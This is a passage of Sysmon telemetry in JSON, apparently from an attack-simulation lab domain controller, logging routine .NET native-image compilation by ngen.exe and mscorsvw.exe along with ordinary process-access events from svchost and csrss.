{"EventTime":"2020-08-01 06:00:24","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7959,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:24.778\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F8-5F25-0000-001046491200}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:24.778","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F8-5F25-0000-001046491200}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7960,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:26.465\r\nProcessGuid: {A837DB8D-04F8-5F25-0000-001046491200}\r\nProcessId: 4320\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10e0-0\\System.Workflow.Runtime.dll\r\nCreationUtcTime: 2020-08-01 06:00:26.465","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:26.465","ProcessGuid":"{A837DB8D-04F8-5F25-0000-001046491200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10e0-0\\System.Workflow.Runtime.dll","CreationUtcTime":"2020-08-01 06:00:26.465","EventReceivedTime":"2020-08-01 06:00:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7961,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:26.543\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FA-5F25-0000-0010A9501200}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:26.543","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FA-5F25-0000-0010A9501200}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7962,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:26.543\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FA-5F25-0000-0010A9501200}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:26.543","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FA-5F25-0000-0010A9501200}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7963,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:26.559\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FA-5F25-0000-0010A9501200}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:26.559","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FA-5F25-0000-0010A9501200}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7964,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:26.637\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FA-5F25-0000-001073551200}\r\nTargetProcessId: 4268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:26.637","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FA-5F25-0000-001073551200}","TargetProcessId":"4268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7965,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:26.637\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FA-5F25-0000-001073551200}\r\nTargetProcessId: 4268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:26.637","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FA-5F25-0000-001073551200}","TargetProcessId":"4268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7966,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:26.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FA-5F25-0000-001073551200}\r\nTargetProcessId: 4268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:26.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FA-5F25-0000-001073551200}","TargetProcessId":"4268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7967,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:27.622\r\nProcessGuid: {A837DB8D-04FA-5F25-0000-001073551200}\r\nProcessId: 4268\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10ac-0\\System.WorkflowServices.dll\r\nCreationUtcTime: 2020-08-01 06:00:27.622","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:27.622","ProcessGuid":"{A837DB8D-04FA-5F25-0000-001073551200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10ac-0\\System.WorkflowServices.dll","CreationUtcTime":"2020-08-01 06:00:27.622","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7968,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.668\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010AB5E1200}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 